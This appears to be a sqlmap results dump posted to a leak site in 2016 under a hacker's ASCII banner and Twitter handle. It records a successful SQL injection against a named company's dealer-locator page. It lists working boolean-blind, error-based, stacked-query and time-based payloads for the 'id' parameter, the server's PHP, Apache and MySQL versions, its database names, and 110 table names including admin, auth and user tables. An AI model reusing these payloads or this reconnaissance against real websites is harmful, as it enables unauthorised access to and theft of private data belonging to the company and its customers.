_____                    _____                    _____                    _____                            _____                _____          
         /\    \                  /\    \                  /\    \                  /\    \                          /\    \              |\    \         
        /::\____\                /::\    \                /::\    \                /::\____\                        /::\    \             |:\____\        
       /:::/    /               /::::\    \              /::::\    \              /:::/    /                       /::::\    \            |::|   |        
      /:::/    /               /::::::\    \            /::::::\    \            /:::/    /                       /::::::\    \           |::|   |        
     /:::/    /               /:::/\:::\    \          /:::/\:::\    \          /:::/    /                       /:::/\:::\    \          |::|   |        
    /:::/____/               /:::/__\:::\    \        /:::/  \:::\    \        /:::/____/                       /:::/__\:::\    \         |::|   |        
   /::::\    \              /::::\   \:::\    \      /:::/    \:::\    \      /::::\    \                      /::::\   \:::\    \        |::|   |        
  /::::::\    \   _____    /::::::\   \:::\    \    /:::/    / \:::\    \    /::::::\____\________            /::::::\   \:::\    \       |::|___|______  
 /:::/\:::\    \ /\    \  /:::/\:::\   \:::\    \  /:::/    /   \:::\    \  /:::/\:::::::::::\    \          /:::/\:::\   \:::\ ___\      /::::::::\    \ 
/:::/  \:::\    /::\____\/:::/  \:::\   \:::\____\/:::/____/     \:::\____\/:::/  |:::::::::::\____\        /:::/__\:::\   \:::|    |    /::::::::::\____\
\::/    \:::\  /:::/    /\::/    \:::\  /:::/    /\:::\    \      \::/    /\::/   |::|~~~|~~~~~             \:::\   \:::\  /:::|____|   /:::/~~~~/~~      
 \/____/ \:::\/:::/    /  \/____/ \:::\/:::/    /  \:::\    \      \/____/  \/____|::|   |                   \:::\   \:::\/:::/    /   /:::/    /         
          \::::::/    /            \::::::/    /    \:::\    \                    |::|   |                    \:::\   \::::::/    /   /:::/    /          
           \::::/    /              \::::/    /      \:::\    \                   |::|   |                     \:::\   \::::/    /   /:::/    /           
           /:::/    /               /:::/    /        \:::\    \                  |::|   |                      \:::\  /:::/    /    \::/    /            
          /:::/    /               /:::/    /          \:::\    \                 |::|   |                       \:::\/:::/    /      \/____/             
         /:::/    /               /:::/    /            \:::\    \                |::|   |                        \::::::/    /                           
        /:::/    /               /:::/    /              \:::\____\               \::|   |                         \::::/    /                            
        \::/    /                \::/    /                \::/    /                \:|   |                          \::/____/                             
         \/____/                  \/____/                  \/____/                  \|___|                           ~~                                   
                                                                                                                                                          
Parameter: http://www.singerco.com/locations/dealer-locator?id=2101 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2101 AND 5128=5128

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2101 AND (SELECT 9656 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT (ELT(9656=9656,1))),0x71707a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query - comment)
    Payload: id=2101;SELECT BENCHMARK(5000000,MD5(0x6657556e))#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=2101 AND SLEEP(5)
---
web application technology: PHP 5.2.13, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
available databases [3]:
[*] dealerweb
[*] dealerweb_beta
[*] information_schema

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2101 AND 5128=5128

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2101 AND (SELECT 9656 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT (ELT(9656=9656,1))),0x71707a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query - comment)
    Payload: id=2101;SELECT BENCHMARK(5000000,MD5(0x6657556e))#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=2101 AND SLEEP(5)
---
web application technology: PHP 5.2.13, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
Database: dealerweb
[110 tables]
+---------------------------+
| _temp_dealer_survey       |
| language                  |
| transaction               |
| user                      |
| acc_category              |
| activity                  |
| admin                     |
| attribute_choice          |
| auth                      |
| auth_content_block        |
| category                  |
| content                   |
| content_block             |
| content_compatible_list   |
| country                   |
| coupon                    |
| course                    |
| dealer                    |
| dealer_product            |
| diy                       |
| download                  |
| event                     |
| faq                       |
| faq_cat_list              |
| faq_machine               |
| history                   |
| homepage_bubble           |
| homepage_header           |
| incl_pfoot                |
| instr_material            |
| instr_material_list       |
| legal                     |
| library                   |
| location                  |
| location_canada           |
| machine_accessory         |
| machine_category          |
| machine_category_list     |
| machine_group_accessory   |
| machine_group_product     |
| machine_groups            |
| mail_list                 |
| menu_assets               |
| menu_banners              |
| migration_version         |
| nav                       |
| new_accessories           |
| new_accessory_category    |
| new_accessory_images      |
| new_products_dev          |
| new_products_live         |
| new_retailer              |
| news                      |
| orderline                 |
| package_history           |
| parts_transaction         |
| pfoot_cat_list            |
| product_activity          |
| product_category          |
| product_image             |
| product_language          |
| product_skill             |
| product_subcategory       |
| product_support_download  |
| products                  |
| project_image             |
| project_type_list         |
| province                  |
| quickstats                |
| retailer                  |
| retailer_list             |
| review                    |
| review_attribute          |
| sb_commentmeta            |
| sb_comments               |
| sb_links                  |
| sb_options                |
| sb_postmeta               |
| sb_posts                  |
| sb_term_relationships     |
| sb_term_taxonomy          |
| sb_termmeta               |
| sb_terms                  |
| sb_usermeta               |
| sb_users                  |
| settings                  |
| sf_guard_group            |
| sf_guard_group_permission |
| sf_guard_permission       |
| sf_guard_remember_key     |
| sf_guard_user             |
| sf_guard_user_group       |
| sf_guard_user_permission  |
| sf_guard_user_profile     |
| singerco_orderline        |
| singerco_product          |
| singerco_transaction      |
| skill                     |
| spotlight                 |
| state                     |
| subcategory               |
| tax_state                 |
| user_answer               |
| user_comment              |
| user_marketing            |
| user_product_reg          |
| user_question             |
| warranty                  |
| zipcode                   |             
| zipcode_canada            |
+---------------------------+  https://twitter.com/north198181
 


# siph0n [2016-08-22]